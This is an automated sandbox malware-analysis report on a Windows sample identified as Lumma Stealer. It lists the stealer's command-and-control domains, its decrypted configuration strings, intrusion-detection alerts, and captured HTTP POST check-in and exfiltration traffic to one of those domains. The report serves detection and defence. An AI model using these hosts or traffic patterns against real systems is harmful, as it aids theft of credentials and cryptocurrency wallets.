Edit tour

Windows Analysis Report
launcher.exe

Overview

General Information

Sample name:	launcher.exe
Analysis ID:	1581495
MD5:	7baf86e82d62f1d5c869d2213bc6d917
SHA1:	56f74a708d7aabb48a4ce88ce12e5ce21349e92c
SHA256:	513068d14f2e69b852712b380446a358211faadf6d345025954de638c2c83522
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

launcher.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\launcher.exe" MD5: 7BAF86E82D62F1D5C869D2213BC6D917)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

launcher.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\launcher.exe" MD5: 7BAF86E82D62F1D5C869D2213BC6D917)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cashfuzysao.buzz", "scentniej.buzz", "inherineau.buzz", "stingyerasjhru.click", "hummskitnj.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz"], "Build id": "pqZnKP--b2JsYWtvX3"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2139030669.000000000356D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: launcher.exe PID: 7104	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: launcher.exe PID: 7104	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: launcher.exe PID: 7104	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T22:30:58.365194+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.58.80	443	TCP
2024-12-27T22:31:00.396793+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.58.80	443	TCP
2024-12-27T22:31:02.747756+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.58.80	443	TCP
2024-12-27T22:31:05.219651+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	104.21.58.80	443	TCP
2024-12-27T22:31:07.670895+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	104.21.58.80	443	TCP
2024-12-27T22:31:10.201530+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	104.21.58.80	443	TCP
2024-12-27T22:31:12.698465+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	104.21.58.80	443	TCP
2024-12-27T22:31:16.532548+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	104.21.58.80	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T22:30:59.126737+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	104.21.58.80	443	TCP
2024-12-27T22:31:01.159733+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49709	104.21.58.80	443	TCP
2024-12-27T22:31:17.356671+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49718	104.21.58.80	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T22:30:59.126737+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49708	104.21.58.80	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T22:31:01.159733+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49709	104.21.58.80	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T22:31:12.710714+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49714	104.21.58.80	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "scentniej.buzz", "inherineau.buzz", "stingyerasjhru.click", "hummskitnj.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz"], "Build id": "pqZnKP--b2JsYWtvX3"}

Multi AV Scanner detection for submitted file

Source: launcher.exe

ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: launcher.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: stingyerasjhru.click
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String decryptor: pqZnKP--b2JsYWtvX3

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_00418BD5 CryptUnprotectData,

3_2_00418BD5

Source: launcher.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.80:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B51FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B51FE9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B51F38 FindFirstFileExW,	0_2_00B51F38
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B51FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B51FE9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B51F38 FindFirstFileExW,	3_2_00B51F38

Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then jmp ecx	3_2_00439A70
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov edx, ecx	3_2_00409AD0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then jmp edx	3_2_00421C71
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_00425560
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_00418592
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then push ebx	3_2_00418592
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then jmp ecx	3_2_00418592
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov esi, eax	3_2_0043B5B2
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	3_2_0043D6F0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	3_2_0042B744
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h	3_2_0043E780
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h	3_2_00421FAE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, bx	3_2_00423011
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00434010
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043D020
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043D020
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041F8F0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+00h]	3_2_0040A8B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043D0B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043D0B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov esi, eax	3_2_0041590C
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh	3_2_0043E910
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	3_2_0043A120
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_004211C0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004211C0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_004259F0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	3_2_0040B188
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then dec ebp	3_2_0043CA70
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0041AA00
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-08DA5397h]	3_2_00409210
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_0040B2DC
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	3_2_0040B2DC
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp cl, 0000002Eh	3_2_00425AE5
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]	3_2_00425AE5
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	3_2_0040BAEE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	3_2_0042BA95
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_004292B0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov word ptr [eax], 000Ah	3_2_00424B4E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+esi-38h]	3_2_00424B4E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then jmp ebp	3_2_0040A370
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	3_2_0040B30C
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]	3_2_00407410
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	3_2_00407410
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	3_2_0040B4E6
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov dword ptr [esi+08h], 00000000h	3_2_0040B4E6
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh	3_2_004144A7
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov esi, ebx	3_2_00427560
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_00427560
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov edx, ecx	3_2_004095D0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp cl, 0000002Eh	3_2_00425DD7
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]	3_2_00425DD7
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp word ptr [eax+edx], 0000h	3_2_0040ADE9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043CDA0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043CDA0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041DDB0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_004175BE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h	3_2_00415E4D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov esi, dword ptr [ebp+0Ch]	3_2_00415E4D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then jmp dword ptr [00444C10h]	3_2_00427E01
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_0043AE2E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	3_2_0043AE2E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov ecx, eax	3_2_0043AE2E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043CEC0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043CEC0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043CEDB
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043CEDB
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	3_2_0043CED9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	3_2_0043CED9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+58h]	3_2_0041A690
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-1E5C1D94h]	3_2_00428751
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00408F60
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_004297E0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00433FF2
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h	3_2_00421FB0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+2DBB26ABh]	3_2_004247B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49714 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49709 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49718 -> 104.21.58.80:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: stingyerasjhru.click
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.58.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.58.80:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZUDCML0497F0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z5Z53SHDMTWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2L20RSF7XLGOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20536Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7Q2S1CRO2NSR12GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1250Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OUR7IG7QLPPSJ8ENS0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569008Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: stingyerasjhru.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: stingyerasjhru.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click

Source: launcher.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: launcher.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: launcher.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: launcher.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: launcher.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: launcher.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: launcher.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: launcher.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: launcher.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: launcher.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: launcher.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: launcher.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: launcher.exe, 00000003.00000003.2112417255.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: launcher.exe	String found in binary or memory: http://www.digicert.com/CPS0
